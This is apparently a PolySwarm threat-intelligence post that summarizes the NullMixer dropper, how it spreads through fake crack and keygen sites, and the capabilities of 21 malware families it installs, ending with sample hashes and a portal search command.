Related Families: SmokeLoader, RedLine Stealer, PseudoManuscrypt, ColdStealer, FormatLoader, CsdiMonetize, Disbuk, Fabookie, DanaBot, Racealer, Generic.ClipBanker, SgnitLoader, ShortLoader, Downloader.INNO, LgoogLoader, Downloader.Bitser, C-Joker, PrivateLoader, Satacom, GCleaner, Vidar
Verticals Targeted: Multiple
Kaspersky recently reported on NullMixer, a dropper used to drop a myriad of malware families, including SmokeLoader, RedLine Stealer, PseudoManuscrypt, ColdStealer, FormatLoader, CsdiMonetize, Disbuk, Fabookie, DanaBot, Racealer, Generic.ClipBanker, SgnitLoader, ShortLoader, Downloader.INNO, LgoogLoader, Downloader.Bitser, C-Joker, PrivateLoader, Satacom, GCleaner, and Vidar.
- NullMixer drops a myriad of malware families.
- NullMixer is typically disguised as software related to cracks, keygens, and activators.
- Currently, at least 21 families are dropped by NullMixer, including bankers, backdoors, stealers, and others.
NullMixer is a dropper currently being used to drop multiple malware families. According to Kaspersky, NullMixer is spread via malicious websites related to cracks, keygens, and activators used for software piracy. Most NullMixer activity was observed targeting users in the US, Brazil, India, Russia, Italy, Germany, France, Egypt, and Turkey.
The threat actors behind NullMixer employ sophisticated SEO to stay near the top of search results. When unwitting victims attempt to download software from the sites, they experience multiple redirects, eventually landing on a page containing an archived password-protected file. While the victims think they are downloading the desired software, the archive actually contains NullMixer.
NullMixer drops the following malware families:
SmokeLoader is a modular malware primarily used to download and execute other payloads.
RedLine Stealer is a stealer malware that harvests various types of information, including saved credentials, autocomplete data, cryptocurrency, and credit card information. It also takes a system inventory of the victim’s machine, gathering information on the username, location data, hardware configuration, and installed security software. RedLine Stealer can also upload and download files, execute commands, and send information about the infected computer to the C2.
PseudoManuscrypt is a MaaS (malware as a service) used to steal cookies from multiple applications, including Firefox, Chrome, Edge, Opera, and Yandex. The malware also allows keylogging and cryptocurrency theft using ClipBanker. PseudoManuscrypt uses the KCP protocol to download additional plugins.
ColdStealer is used to steal multiple types of information, including crypto wallets, FTP credentials, and credentials from browsers.
FormatLoader uses hardcoded URLs as format strings. It is used to download an additional file and infect a victim's machine.
CsdiMonetize is an advertising platform typically used to install PUAs (potentially unwanted applications). It also drops trojans, such as Glupteba.
Disbuk, also known as Socelar, steals Facebook cookies from Chrome and Firefox, access tokens, account IDs, and Amazon cookies. It installs a malicious browser extension masquerading as Google Translate.
Fabookie targets Facebook ads and steals browser session cookies. It also uses Facebook Graph API Queries to harvest information about a user’s account, linked payment method, balance, and friends.
DanaBot is a modular banking trojan. Functionalities include stealing information and injecting fake forms to collect payment data. It can also give a threat actor full remote access to a machine using the VNC plugin.
Racealer, also known as RaccoonStealer, is a relatively unsophisticated malware as a service written in C/C++. More recent versions use Telegram to retrieve C2 information and malware configurations.
Generic.ClipBanker is a clipboard hijacker. It monitors the victim machine for cryptocurrency addresses and replaces them with the threat actor’s cryptocurrency wallet address to intercept payments.
SgnitLoader is a trojan downloader written in C#.
ShortLoader is another trojan downloader.
Downloader.INNO is an Inno Setup installer that utilizes Inno Download Plugin to download a file from the C2. The downloaded file is related to the Satacom downloader family.
LgoogLoader is an installer that drops three files: a batch file, an AutoIt interpreter, and an AutoIt script. After downloading, it executes the batch file.
Downloader.Bitser is an NSIS installer that installs Lightning Media Player and runs bitsadmin to download additional files.
C-Joker is an Exodus wallet stealer.
PrivateLoader is a pay-per-install loader similar to LgoogLoader and SmokeLoader.
Satacom, also known as LegionLoader, is a loader that uses anti-analysis methods borrowed from al-khazer.
GCleaner is a pay-per-install loader. It was previously distributed as Garbage Cleaner, which mimicked CCleaner. GCleaner is used to download PUAs such as Azorult, Vidar, Predator the Thief, and others.
Vidar is an infostealer that employs password grabbing. It steals browser autofill information, cookies, saved payment information, browser history, coin wallets, and Telegram databases. It can also take screenshots.
PolySwarm has multiple samples of NullMixer.
f2ec0aaf1cd2359465bd42b1951d1c59267137ddba96c85f28c981d622ecf093 b69a81971bd4800d1737ef67ef47e5b6793723c1fd4b75dfbdddf8b28bd93dd5 c91dec1cd5b97079481c76d5d597dde67b60c301ea900eab7db99776d52b465a
You can use the following CLI command to search for all NullMixer samples in our portal:
$ polyswarm link list -f NullMixer
Don’t have a PolySwarm account? Go here to sign up for a free Community plan or to subscribe.
Contact us at email@example.com | Check out our blog | Subscribe to our reports